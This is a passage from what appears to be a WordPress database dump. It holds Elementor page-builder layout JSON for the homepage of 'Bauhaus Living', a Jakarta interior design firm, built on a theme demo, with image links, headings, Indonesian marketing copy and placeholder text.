initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4273,4928,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4274,4928,'_elementor_pro_version','3.8.1'),(4275,4929,'_wp_page_template','elementor_header_footer'),(4276,4929,'_elementor_edit_mode','builder'),(4277,4929,'_elementor_template_type','wp-page'),(4278,4929,'_elementor_version','3.8.1'),(4279,4929,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan 